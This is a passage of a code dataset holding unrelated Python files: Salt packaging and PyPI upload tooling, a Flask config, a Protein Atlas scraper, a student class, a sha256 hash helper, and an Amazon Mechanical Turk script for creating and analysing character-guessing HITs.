...\")\n digest_file_path.write_text(digest.hexdigest())\n hashes[hash_name] = hexdigest\n hashes_json_path = fpath.parent / f\"{fpath.name}.json\"\n ctx.info(f\" * Writing {hashes_json_path} ...\")\n hashes_json_path.write_text(json.dumps(hashes))\n ctx.info(\"Done\")\n\n\n@pkg.command(\n name=\"source-tarball\",\n venv_config={\n \"requirements_files\": [\n tools.utils.REPO_ROOT / \"requirements\" / \"build.txt\",\n ]\n },\n)\ndef source_tarball(ctx: Context):\n shutil.rmtree(\"dist/\", ignore_errors=True)\n timestamp = ctx.run(\n \"git\",\n \"show\",\n \"-s\",\n \"--format=%at\",\n \"HEAD\",\n capture=True,\n ).stdout.strip()\n env = {\n **os.environ,\n **{\n \"SOURCE_DATE_EPOCH\": str(timestamp),\n },\n }\n ctx.run(\n \"python3\",\n \"-m\",\n \"build\",\n \"--sdist\",\n str(tools.utils.REPO_ROOT),\n env=env,\n check=True,\n )\n # Recreate sdist to be reproducible\n recompress = Recompress(timestamp)\n for targz in tools.utils.REPO_ROOT.joinpath(\"dist\").glob(\"*.tar.gz\"):\n ctx.info(f\"Re-compressing {targz.relative_to(tools.utils.REPO_ROOT)} ...\")\n recompress.recompress(targz)\n sha256sum = shutil.which(\"sha256sum\")\n if sha256sum:\n packages = [\n str(pkg.relative_to(tools.utils.REPO_ROOT))\n for pkg in tools.utils.REPO_ROOT.joinpath(\"dist\").iterdir()\n ]\n ctx.run(\"sha256sum\", *packages)\n ctx.run(\"python3\", \"-m\", \"twine\", \"check\", \"dist/*\", check=True)\n\n\n@pkg.command(\n name=\"pypi-upload\",\n venv_config={\n \"requirements_files\": [\n tools.utils.REPO_ROOT / \"requirements\" / \"build.txt\",\n ]\n },\n arguments={\n \"files\": {\n \"help\": \"Files to upload to PyPi\",\n \"nargs\": \"*\",\n },\n \"test\": {\n \"help\": \"When true, upload to test.pypi.org instead\",\n },\n },\n)\ndef pypi_upload(ctx: Context, files: list[pathlib.Path], test: bool = False):\n ctx.run(\n \"python3\", \"-m\", \"twine\", \"check\", *[str(fpath) for fpath in files], check=True\n )\n if test is True:\n repository_url = \"https://test.pypi.org/legacy/\"\n else:\n repository_url = \"https://upload.pypi.org/legacy/\"\n if \"TWINE_USERNAME\" not in os.environ:\n os.environ[\"TWINE_USERNAME\"] = \"__token__\"\n if 
\"TWINE_PASSWORD\" not in os.environ:\n ctx.error(\"The 'TWINE_PASSWORD' variable is not set. Cannot upload.\")\n ctx.exit(1)\n cmdline = [\n \"twine\",\n \"upload\",\n f\"--repository-url={repository_url}\",\n \"--username=__token__\",\n ]\n if test is True:\n cmdline.append(\"--skip-existing\")\n cmdline.extend([str(fpath) for fpath in files])\n ctx.info(f\"Running '{' '.join(cmdline)}' ...\")\n ret = ctx.run(*cmdline, check=False)\n if ret.returncode:\n ctx.error(ret.stderr.strip().decode())\n ctx.exit(ret.returncode)\n\n\n@pkg.command(\n name=\"configure-git\",\n arguments={\n \"user\": {\n \"help\": \"The git global username\",\n \"required\": False,\n },\n \"email\": {\n \"help\": \"The git global email\",\n \"required\": False,\n },\n },\n)\ndef configure_git(\n ctx: Context,\n user: str = \"Salt Project Packaging\",\n email: str = \"saltproject-packaging@vmware.com\",\n):\n cwd = pathlib.Path.cwd()\n ctx.info(\"Setting name and email in git global config\")\n ctx.run(\"git\", \"config\", \"--global\", \"user.name\", f\"'{user}'\")\n ctx.run(\"git\", \"config\", \"--global\", \"user.email\", f\"{email}\")\n ctx.info(f\"Adding {str(cwd)} as a safe directory\")\n ctx.run(\"git\", \"config\", \"--global\", \"--add\", \"safe.directory\", str(cwd))\n\n\n@pkg.command(\n name=\"apply-release-patch\",\n arguments={\n \"patch\": {\"help\": \"The git global username\"},\n \"delete\": {\n \"help\": \"Whether to delete the patch after applying\",\n \"required\": False,\n },\n },\n)\ndef apply_release_patch(ctx: Context, patch: pathlib.Path, delete: bool = False):\n patch = patch.resolve()\n ctx.info(\"Applying the release patch\")\n ctx.run(\"git\", \"am\", \"--committer-date-is-author-date\", patch.name)\n if delete:\n ctx.info(\"Deleting the release patch because --delete was passed\")\n patch.unlink()\n","repo_name":"saltstack/salt","sub_path":"tools/pkg/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15881,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"25957851069","text":"import os\nfrom flask import Flask\nfrom flask_moment import Moment\n\nSECRET_KEY = os.urandom(32)\n# Grabs the folder where the script runs.\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# Enable debug mode.\nDEBUG = True\n\n# Connect to the database\n\n\n# IMPLEMENT DATABASE URL\nSQLALCHEMY_DATABASE_URI = 'postgres://postgres:admin@localhost:5432/fyyur'\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\n\n","repo_name":"BaduraM/fyyur","sub_path":"projects/01_fyyur/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8274003512","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 17:29:40 2021\n\nProtein Atlas Access\n\n@author: Carrie\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\ntest_ID = \"ENSG00000178394\" #ID for the protein HTR1A\n#this protein is expressed in the ovaries, with both protein and RNA evidence\n\ndef get_protein_xml(ensID):\n \"\"\" Retrieves the XML file for a protein from the Protein Atlas\n \n Parameters\n ----------\n ensID : str\n an ensembl gene ID\n\n Returns\n -------\n paResp : requests.models.Response\n the XML file from the 
Protein Atlas for the gene of interest in the\n for of a Response object. \n \"\"\"\n #step 1, use ensID to generate the protein atlas URL\n #https://www.proteinatlas.org/ENSG00000178394.xml\n paURL = \"https://www.proteinatlas.org/\" + ensID + \".xml\"\n print(paURL)\n paResp = requests.get(paURL)\n #print(paResp.content)\n #paSoup = BeautifulSoup(paResp.content, 'lxml-xml', from_encoding = 'utf-8')\n #pretty = paSoup.prettify()\n #print(pretty[:1000])\n return paResp\n\n\ndef get_RNA_tissue_data(paResponse):\n \"\"\"parses the protein xml file to retrieve ovary-specific \n RNA expresssion data.\n \n Currently this function is written to only work for ovarian tissue.\n Once I have a better idea what I need, I might expand it to work for\n generic tissue types (and therefor take another argument)\n\n Parameters\n ----------\n paResponse : requests.models.Response\n The response object received from proteinatlas.org.\n Contains the atlas' xml file for a target protein. \n\n Returns\n -------\n float : the normalized RNA Expression\n\n \"\"\"\n #\n #Ovary\n normRNAExp = None\n paSoup = BeautifulSoup(paResponse.content, 'lxml-xml', \n from_encoding = 'utf-8')\n ovaryTissues = paSoup.find_all(ontologyTerms=\"UBERON:0000992\")\n #finds all the tissue tags with the ontologyTerms attribute for ovary\n allSiblings = []\n for tag in ovaryTissues:\n prevL = tag.find_previous_siblings(\"level\")\n nextL = tag.find_next_siblings(\"level\")\n #siblings with a tag will have expression level data\n siblings = prevL + nextL\n allSiblings.append(siblings) #this is a list of lists of tags\n #print(siblings)\n \n for sibL in allSiblings: #for each list of tags\n for sib in sibL: #for each tag\n if sib['type'] == 'normalizedRNAExpression':\n normRNAExp = sib['expRNA']\n if normRNAExp == None:\n print(\"no value was set for normRNAExp\")\n return float(normRNAExp)\n #In [147]: allSiblings[3][0]['type']\n #Out[147]: 'normalizedRNAExpression' \n\n# I think I need to find the tissue tag for ovary, then look at its siblings\n# bs has sibling search functionality. 
Can find all \"ontologyTerms\" tags\n# that have ontologyTerms=\"UBERON:0000992\" then check through siblings\n# to find \n# for example\n\ndef test_run():\n paR = get_protein_xml(test_ID)\n paS = get_RNA_tissue_data(paR)\n #tissueList = paS.find_all(has_tissue_and_ont)\n #tissueList = paS.find_all(ontologyTerms=\"UBERON:0000992\")\n #print(tissueList[0])\n #return tissueList\n\n #for t in tissueList:\n #print(t)\n #if t[\"ontologyTerms\"] == \"UBERON:0000992\":\n #print(t)\n #print(tag)\n #print(tag[\"ontologyTerms\"])\n #found = paS.find_all(organ=\"Female tissues\")\n #if len(found) == 0:\n # print(\"nothing found\")\n #else:\n # for i in range(min(10, len(found))):\n # print(found[i].prettify())\n\n return paS\n \n \n \n \n \n \n \n \n ","repo_name":"GradinaruLab/BMGF-Caltech","sub_path":"Archive/proteinAtlasAccess 3-10.py","file_name":"proteinAtlasAccess 3-10.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4416158842","text":"#!/usr/bin/python3\n\n'''\nthe module that contains the function\n'''\n\n\nclass Student:\n \"\"\"A class of students\"\"\"\n\n def __init__(self, first_name, last_name, age):\n \"\"\"Initialization of the instance variables\"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n item = (list, dict, str, int, bool)\n obj_dict = {}\n if attrs is None:\n for key, value in self.__dict__.items():\n if isinstance(value, (list, dict, str, int, bool)):\n obj_dict[key] = value\n else:\n for key, value in self.__dict__.items():\n if key in attrs and isinstance(value, item):\n obj_dict[key] = value\n return obj_dict\n","repo_name":"OfficialEcho95/alx-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12025924055","text":"\"\"\"Utils\n\nA small module that contains a collection of some useful functions.\n\n\"\"\"\n\nimport logging\nfrom hashlib import sha256\nfrom io import BufferedRandom, BufferedReader, BufferedWriter, BytesIO\nfrom typing import Union\n\nlogger = logging.getLogger(__name__)\n\n\ndef sha256_hash(\n data: Union[bytes, BufferedWriter, BufferedReader, BufferedRandom]\n) -> str:\n \"\"\"Get the sha256 hash value of the passed data.\n\n Args:\n data (Union[bytes, BufferedWriter, BufferedReader, BufferedRandom]): Digested data.\n\n Raises:\n NotImplementedError: Raised when the data argument is not implemented.\n\n Returns:\n str: The sha256 hash value.\n \"\"\"\n # buffer_size is totally arbitrary, change for your app!\n buffer_size = 65536 # lets read stuff in 64kb chunks!\n hashalgo = sha256()\n if isinstance(data, bytes):\n stream = BytesIO(data)\n elif isinstance(data, str):\n stream = BytesIO(data.encode(\"utf-8\"))\n elif isinstance(data, (BufferedWriter, BufferedReader, BufferedRandom)):\n stream = data\n else:\n raise NotImplementedError(\n type(data), \"if you try to open a file please use binary mode ('b')\"\n )\n\n while True:\n data = stream.read(buffer_size)\n if not data:\n break\n hashalgo.update(data)\n return 
hashalgo.hexdigest()\n","repo_name":"wenzfe/analysis-of-ransomware-attacks","sub_path":"src/package_mwutils/mwutils/utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7387207421","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom tkinter import *\nfrom matplotlib import pyplot\nfrom PIL import ImageTk, Image\nimport numpy as np\nimport scipy.optimize as op\nimport boto3\nimport html\nimport collections\nimport itertools\nimport operator\nimport json\n\n\ndef clear_text(event):\n event.widget.delete(0, \"end\")\n\n\ndef choose_test(test_type, window, wave=1):\n global test\n test = test_type\n global is_First_wave\n is_First_wave = wave\n window.destroy()\n\n\ndef add_window(root=None):\n addwindow = Toplevel(root)\n addwindow.title(\"Add HIT\")\n addwindow.grab_set()\n\n # Creating label and entry\n label_title = Label(addwindow, text=\"Title of the HIT\")\n label_title.pack(side=TOP)\n title = Entry(addwindow, width=30)\n title.insert(0, \"Guess all the characters in a sentence\")\n title.bind(\"\", clear_text)\n title.pack(side=TOP)\n\n label_description = Label(addwindow, text=\"Description of the HIT\")\n label_description.pack(side=TOP)\n description = Entry(addwindow, width=30)\n description.insert(\n 0,\n \"Given a random sentence, find all the characters of the sentence one by one.\",\n )\n description.bind(\"\", clear_text)\n description.pack(side=TOP)\n\n label_keyword = Label(addwindow, text=\"Keywords for the HIT\")\n label_keyword.pack(side=TOP)\n keyword = Entry(addwindow, width=30)\n keyword.insert(0, \"Natural language, artificial intelligence, information theory\")\n keyword.bind(\"\", clear_text)\n keyword.pack(side=TOP)\n\n label_reward = Label(addwindow, text=\"Amount of money for the HIT\")\n label_reward.pack(side=TOP)\n reward = Entry(addwindow, width=30)\n reward.insert(0, \"0.1\")\n reward.bind(\"\", clear_text)\n reward.pack(side=TOP)\n\n label_maxAssign = Label(addwindow, text=\"Maximum assignments of the HIT\")\n label_maxAssign.pack(side=TOP)\n maxAssign = Entry(addwindow, width=30)\n maxAssign.insert(0, \"9\")\n maxAssign.bind(\"\", clear_text)\n maxAssign.pack(side=TOP)\n\n label_duration = Label(addwindow, text=\"Duration of the HIT\")\n label_duration.pack(side=TOP)\n duration = Entry(addwindow, width=30)\n duration.insert(0, \"604800\") # 2 days\n duration.bind(\"\", clear_text)\n duration.pack(side=TOP)\n\n label_workingTime = Label(\n addwindow, text=\"Time available for the worker for the HIT\"\n )\n label_workingTime.pack(side=TOP)\n workingTime = Entry(addwindow, width=30)\n workingTime.insert(0, \"1200\") # 20 minutes\n workingTime.bind(\"\", clear_text)\n workingTime.pack(side=TOP)\n\n label_approvalDelay = Label(addwindow, text=\"Time of approval of the HIT\")\n label_approvalDelay.pack(side=TOP)\n approvalDelay = Entry(addwindow, width=30)\n approvalDelay.insert(0, \"172800\") # 1 day\n approvalDelay.bind(\"\", clear_text)\n approvalDelay.pack(side=TOP)\n\n validation = Button(\n addwindow,\n text=\"Validate\",\n command=lambda: validate(\n title.get(),\n description.get(),\n keyword.get(),\n reward.get(),\n maxAssign.get(),\n duration.get(),\n workingTime.get(),\n approvalDelay.get(),\n addwindow,\n ),\n )\n validation.pack(side=TOP)\n\n\ndef validate(\n title,\n description,\n keyword,\n reward,\n maxAssign,\n duration,\n workingTime,\n approvalDelay,\n window,\n):\n assert title, \"Title 
must be indicated!\"\n assert description, \"You must provide a description for the HIT\"\n assert keyword, \"You must provide keyword(s) for the HIT\"\n assert reward.replace(\n \".\", \"\", 1\n ).isdigit(), \"You must indicate the amount of reward\"\n assert maxAssign.isnumeric(), \"Maximum assignment must be provided\"\n assert duration.isnumeric(), \"You must indicate the assignment duration\"\n assert workingTime.isnumeric(), \"You must indicate the working time\"\n\n print(\n \"you have entered:\",\n title,\n description,\n keyword,\n reward,\n maxAssign,\n duration,\n workingTime,\n approvalDelay,\n )\n\n if test == \"gambling\":\n if is_First_wave == 1:\n file = open(prefix + \"HIT_list\" + wave_number + \".txt\", \"a\")\n wave_number_file = open(prefix + \"wave_number_file.txt\", \"w\")\n wave_number_file.write(\"1\")\n wave_number_file.close()\n random_sentence = open(\"parse_text.txt\", \"r\").read().splitlines()\n else:\n list_sentence = [] # to store sentences that have already been pubulished\n file = open(prefix + \"HIT_list\" + str(int(wave_number) + 1) + \".txt\", \"a\")\n previous_result = open(\n prefix + \"Submitted_result/submitted_result\" + wave_number + \".txt\", \"r\"\n )\n with open(prefix + \"wave_number_file.txt\", \"r+\") as wave_number_file:\n wave_number_file.seek(0)\n wave_number_file.write(str(int(wave_number) + 1))\n wave_number_file.truncate()\n else:\n random_sentence = open(\"parse_text.txt\", \"r\").read().splitlines()\n file = open(prefix + \"HIT_list.txt\", \"a\")\n\n for i in range(12): # Number of HIT\n ### Gambling test\n if test == \"gambling\":\n if is_First_wave == 1:\n # list_sentence=[]\n # list_sentence.append('\"'+random_sentence[i*2+ii]+'\"')\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(\n maxAssign\n ), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question.replace(\n \"replace sentence here\", random_sentence[i]\n ),\n QualificationRequirements=[\n {\n \"QualificationTypeId\": \"00000000000000000071\",\n \"Comparator\": \"In\",\n \"LocaleValues\": [\n {\"Country\": \"GB\"},\n {\"Country\": \"US\"},\n {\"Country\": \"CA\"},\n {\"Country\": \"AU\"},\n ],\n }\n ],\n )\n # question_form = question.replace(\"replace sentence here\", \",\".join(list_sentence))\n else:\n # list_start_character_index = []\n # list_capital = []\n while True:\n tmp = previous_result.readline().split(\"&\")\n # print(\"\\n\\ncest tmp2\",tmp[2][len('Answer: '):],\"\\n\\n\")\n previous_sentence = tmp[2][len(\"Answer: \") :]\n if previous_sentence not in list_sentence:\n list_sentence.append(previous_sentence)\n question_form = question.replace(\n \"replace sentence here\", previous_sentence\n )\n break\n # list_start_character_index.append(tmp[3])\n # list_capital.append(tmp[4].split(\",\")[-1])\n\n question_form = question_form.replace(\n \"replace start character index here\", tmp[3]\n )\n # question_form = question_form.replace(\"replace start fund here\", \",\".join(list_capital))\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(\n maxAssign\n ), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n 
AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question_form,\n QualificationRequirements=[\n {\n \"QualificationTypeId\": \"00000000000000000071\",\n \"Comparator\": \"In\",\n \"LocaleValues\": [\n {\"Country\": \"GB\"},\n {\"Country\": \"US\"},\n {\"Country\": \"CA\"},\n {\"Country\": \"AU\"},\n ],\n }\n ],\n )\n # test_fichier = open(\"../test/test.html\",\"w\")\n # test_fichier.write(question_form)\n # test_fichier.close()\n\n ### Other test than gambling\n else:\n new_hit = mturk.create_hit(\n Title=title,\n Description=description,\n Keywords=keyword,\n Reward=reward, # Amount of money per HIT (in $)\n MaxAssignments=int(maxAssign), # Number of slot available for worker\n LifetimeInSeconds=int(duration), # Time until the HIT end\n AssignmentDurationInSeconds=int(workingTime), # Time of work\n AutoApprovalDelayInSeconds=int(approvalDelay),\n Question=question.replace(\"replace here\", random_sentence[i]),\n # QualificationRequirements = [\n # {\n # 'QualificationTypeId': '00000000000000000071',\n # 'Comparator': 'In',\n # 'LocaleValues': [\n # {'Country': 'GB'}, {'Country': 'US'}, {'Country': 'CA'}, {'Country': 'AU'}\n # ]\n # }\n # ]\n )\n\n print(\"A new HIT has been created. You can preview it here:\")\n print(\n \"https://workersandbox.mturk.com/mturk/preview?groupId=\"\n + new_hit[\"HIT\"][\"HITGroupId\"]\n )\n print(\"HITID = \" + new_hit[\"HIT\"][\"HITId\"] + \" (Use to Get Results)\")\n\n file.write(new_hit[\"HIT\"][\"HITId\"] + \"\\n\")\n\n file.close()\n\n window.destroy()\n\n\ndef result_window(root=None):\n resultwindow = Toplevel(root)\n resultwindow.title(\"Reviewing HITs\")\n resultwindow.grab_set()\n\n submitted = Button(\n resultwindow, text=\"Retrieve all submitted answer\", command=retrieve_all\n )\n submitted.pack(side=TOP)\n\n\n# Only view submitted assigment\ndef retrieve_submitted():\n # if test==\"gambling\":\n # if is_First_wave==1:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result.txt\",\"w\")\n\n # for HIT in file:\n # print(HIT)\n # answer = mturk.list_assignments_for_hit(HITId=HIT[:-1], AssignmentStatuses=['Submitted'])\n # for i in answer['Assignments']:\n # result = i[\"Answer\"]\n # result = html.unescape(\"AssignmentId: \"+i[\"AssignmentId\"] + \"&WorkerId: \" + i[\"WorkerId\"] + \"&Answer: \" + result[result.find(\"\")+len(\"\"):result.find(\"\")] +\"\\n\")\n # submitted_result.write(result)\n\n # file.close()\n # submitted_result.close()\n\n analyse_result()\n\n\ndef retrieve_all():\n # if test==\"gambling\":\n # if is_First_wave==1:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result\"+wave_number+\".txt\",\"w\")\n # else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n # submitted_result = open(prefix+\"Submitted_result/submitted_result.txt\",\"w\")\n\n # for HIT in file:\n # print(HIT)\n # answer = 
mturk.list_assignments_for_hit(HITId=HIT[:-1], AssignmentStatuses=['Approved','Submitted'])\n # for i in answer['Assignments']:\n # result = i[\"Answer\"]\n # result = html.unescape(\"AssignmentId: \"+i[\"AssignmentId\"] + \"&WorkerId: \" + i[\"WorkerId\"] + \"&Answer: \" + result[result.find(\"\")+len(\"\"):result.find(\"\")] +\"\\n\")\n # submitted_result.write(result)\n\n # file.close()\n # submitted_result.close()\n\n analyse_resultV2()\n\n\ndef analyse_resultV2():\n # To count number of system error\n nb_error = 0\n\n if test != \"gambling\":\n if test == \"simple\":\n rate = []\n number_try = (\n []\n ) # number of tries for an index, number_try[0] means first characters\n list_repeating_letter = [] # list of answer that have bunch of repeating letter\n repeating_letter_cpt = 0 #\n list_guess = []\n nb_ppl_answer = []\n cpt_nb_ppl = 0\n list_plot = []\n somme = 0\n else:\n list_sentence = [] # to store sentence that are already retrieved\n bad_result = [] # to store bad result submitted by worker\n dict_answer = (\n {}\n ) # key = the sentence, value = list of dict of character and their percentage\n # the first element is the occurance of the sentence\n if test == \"gambling\":\n # file = open(prefix+\"HIT_list\"+wave_number+\".txt\",\"r\")\n submitted_result = (\n open(\n prefix + \"Submitted_result/submitted_result\" + wave_number + \".txt\", \"r\"\n )\n .read()\n .split(\"\\n\")[:-1]\n )\n else:\n # file = open(prefix+\"HIT_list.txt\",\"r\")\n submitted_result = (\n open(prefix + \"Submitted_result/submitted_result.txt\", \"r\")\n .read()\n .split(\"\\n\")[:-1]\n )\n\n ####### Storing result in list #######\n # result represent one answer\n for result in submitted_result:\n tmp = result.split(\"&\")\n if test != \"gambling\":\n length = len(tmp[2]) - len(\"Answer: \")\n if length == 0:\n nb_error += 1\n continue\n nb_ppl_answer.append(length)\n # print(tmp)\n if test == \"simple\":\n # print(tmp[2])\n rate.append(\n sum(int(x) for x in tmp[3] if x != \"\\n\") / nb_ppl_answer[cpt_nb_ppl]\n )\n # list_guess.append(tmp[3])\n number_try = itertools.zip_longest(number_try, list(tmp[3]), fillvalue=\"2\")\n number_try = map(\",\".join, number_try)\n # print(list(number_try))\n for i in range(1, len(tmp[4])):\n if tmp[4][i] == tmp[4][i - 1]:\n repeating_letter_cpt += 1\n else:\n repeating_letter_cpt = 0\n if repeating_letter_cpt > 6:\n repeating_letter_cpt = 0\n list_repeating_letter.append(result)\n break\n cpt_nb_ppl += 1\n elif test == \"hard\":\n # print(tmp[3])\n # print(type(tmp[3]))\n # number_try += collections.Counter(map(int,tmp[3].split(\",\")))\n # list_guess.append(list(map(int,tmp[3].split(\",\"))))\n number_try = itertools.zip_longest(\n number_try, tmp[3].split(\",\"), fillvalue=\"0\"\n )\n number_try = map(\",\".join, number_try)\n # print(list(number_try))\n else:\n error_cpt = 0 # counter for errors\n answer = tmp[4].split(\"|\") # answer represent the percentage of bet\n answer.pop()\n\n if wave_number == \"1\":\n list_capital = [1.0]\n else:\n temp = json.loads(\n open(\n prefix\n + \"Submitted_result/mean_result\"\n + str(int(wave_number) - 1)\n + \".txt\",\n \"r\",\n ).read()\n )\n if tmp[2][len(\"Answer: \") :] in temp:\n list_capital = [temp[tmp[2][len(\"Answer: \") :]][1][-1]]\n else:\n continue\n\n # Count there is how much answer for a sentence\n if tmp[2][len(\"Answer: \") :] not in dict_answer:\n dict_answer[tmp[2][len(\"Answer: \") :]] = [1]\n else:\n dict_answer[tmp[2][len(\"Answer: \") :]][0] += 1\n\n for i in answer:\n tmp2 = i.split(\",\")\n tmp_list = 
[]\n tmp_dict = {}\n tmp_list.append(tmp2[0]) # the right character\n for i in range(1, len(tmp2)):\n # else:\n tmp_dict[tmp2[i][0]] = float(\n tmp2[i][1:]\n ) # separate the letter and the percentage, \"A\":50\n tmp_list.append(tmp_dict)\n # print(list_capital[-1])\n if tmp_list[0] in tmp_list[1]:\n list_capital.append(\n 27 * list_capital[-1] * tmp_list[1][tmp_list[0]] / 100.0\n )\n # list_capital *= tmp_list[1][tmp_list[0]]/100.0\n else:\n list_capital.append(list_capital[-1] * 0.01)\n error_cpt = error_cpt + 1\n # list_capital *= 0.01\n if (\n error_cpt > 2\n ): # We don't consider the answer if the error is greater than a treshold\n # print(tmp[2][len(\"Answer: \"):])\n dict_answer[tmp[2][len(\"Answer: \") :]][0] -= 1\n continue\n\n # print(list_capital)\n list_capital.pop(0)\n if len(dict_answer[tmp[2][len(\"Answer: \") :]]) == 1:\n dict_answer[tmp[2][len(\"Answer: \") :]].append(list_capital)\n else:\n dict_answer[tmp[2][len(\"Answer: \") :]][1] = list(\n map(\n operator.add,\n dict_answer[tmp[2][len(\"Answer: \") :]][1],\n list_capital,\n )\n )\n # print(dict_answer)\n # print(dict_answer)\n # exit()\n ####### Analysing result #######\n if test == \"simple\":\n mean = sum(rate) / len(rate)\n print(\"The mean value of answers:\", mean)\n minimum_rate = (\n mean - 0.4 * mean\n ) # If rate of an answer is less than 40% of the mean valu, we have to pay attention\n print(\"minimum:\", minimum_rate)\n\n special_attention = open(prefix + \"Submitted_result/special_attention.txt\", \"w\")\n special_attention.write(\"######## REPEATING LETTER ######## \\n\")\n special_attention.write(\"\\n\".join(list_repeating_letter))\n special_attention.write(\"\\n\\n ######## SPECIAL ATTENTION ########\\n\")\n for index, i in enumerate(rate):\n if i < minimum_rate:\n special_attention.write(submitted_result[index])\n\n special_attention.close()\n\n number_try = list(number_try)\n\n for i in number_try:\n i = collections.Counter(i.split(\",\"))\n del i[\"2\"]\n number_of_answer = sum(i.values())\n list_guess.append(\n {k: v / number_of_answer for k, v in i.items()}\n ) # On regarde que les bonne réponse\n # print(list_guess)\n for index, i in enumerate(list_guess):\n list_plot.append(-sum(np.log(prob) * prob for prob in i.values()))\n\n pyplot.plot(list_plot)\n pyplot.show()\n # print(list_guess)\n elif test == \"hard\":\n # dict_occurrence = list(set(nb_ppl_answer))\n # dict_occurrence.sort()\n # dict_occurrence = {key:sum(v>=key for v in nb_ppl_answer) for key in dict_occurrence}\n # dict_occurrence = sorted(dict_occurrence.items()) # (length of the answer, number of answer who have length more thant that)\n # print(dict_occurrence)\n\n number_try = list(\n number_try\n ) # number_try[0] means number of tries for the first character\n for i in number_try:\n i = collections.Counter(i.split(\",\"))\n del i[\"0\"] # 0 are useless\n number_of_answer = sum(i.values())\n # print(number_of_answer)\n list_guess.append({int(k): v / number_of_answer for k, v in i.items()})\n # print(len(list_guess))\n\n # # Vérifie si tous les lignes font 1\n # a=[]\n # somme = 0\n # for i in list_guess:\n # for key,value in i.items():\n # somme = somme + float(value)\n # a.append(somme)\n # somme = 0\n # print(a)\n\n # Plot h en fonction de nb de lettre\n\n list_upper = [np.log2(27)]\n list_lower = [np.log2(27)]\n\n # print(list_guess)\n for i in list_guess:\n list_upper.append((-sum(np.log(prob) * prob for prob in i.values())))\n i = collections.OrderedDict(sorted(i.items()))\n lower_freq = 0\n for cpt in range(1, 28):\n if 
cpt in i:\n if cpt + 1 in i:\n lower_freq += cpt * (i[cpt] - i[cpt + 1]) * np.log(cpt)\n else:\n lower_freq += cpt * i[cpt] * np.log(cpt)\n else:\n if cpt + 1 in i:\n lower_freq += cpt * -i[cpt + 1] * np.log(cpt)\n list_lower.append(lower_freq)\n\n print(len(list_upper))\n print(len(list_lower))\n # Minimizing the ansazt function\n x0 = np.array([0, 0, 0])\n x = np.arange(1, len(list_upper) + 1)\n # x = np.linspace(1,len(list_upper),len(list_upper))\n matlab = open(\"matlab.txt\", \"w\")\n matlab.write(\"[\" + \",\".join(str(x) for x in list_upper) + \"]\\n\")\n matlab.write(\"[\" + \",\".join(str(x) for x in list_lower) + \"]\")\n y_upper = np.array(list_upper)\n y_lower = np.array(list_lower)\n\n ########### Minimization with f1 ansatz ###########\n\n #### Using least_squres optimization\n res_upper = op.least_squares(\n func, x0, args=(x, y_upper), loss=\"cauchy\", f_scale=0.1\n )\n res_lower = op.least_squares(\n func, x0, args=(x, y_lower), loss=\"cauchy\", f_scale=0.1\n )\n f_upper = ansatz_least(res_upper.x, x)\n f_lower = ansatz_least(res_lower.x, x)\n print(\"res_upper:\", res_upper.x)\n print(\"res_lower:\", res_lower.x)\n pyplot.figure(1)\n pyplot.plot(list_upper, \"o\", label=\"Upper bound data\")\n pyplot.plot(list_lower, \"+\", label=\"Lower bound data\")\n pyplot.plot(\n f_upper,\n label=\"Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_upper.x[0], res_upper.x[1], res_upper.x[2]\n ),\n )\n pyplot.plot(\n f_lower,\n label=\"Fitted lower bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_lower.x[0], res_lower.x[1], res_lower.x[2]\n ),\n )\n pyplot.legend()\n pyplot.suptitle(\"Least squares method\")\n # pyplot.show()\n\n #### Using curve_fit optimization\n res_upper = op.curve_fit(ansatz_curve, x, y_upper)\n res_lower = op.curve_fit(ansatz_curve, x, y_lower)\n f_upper = ansatz_curve(x, 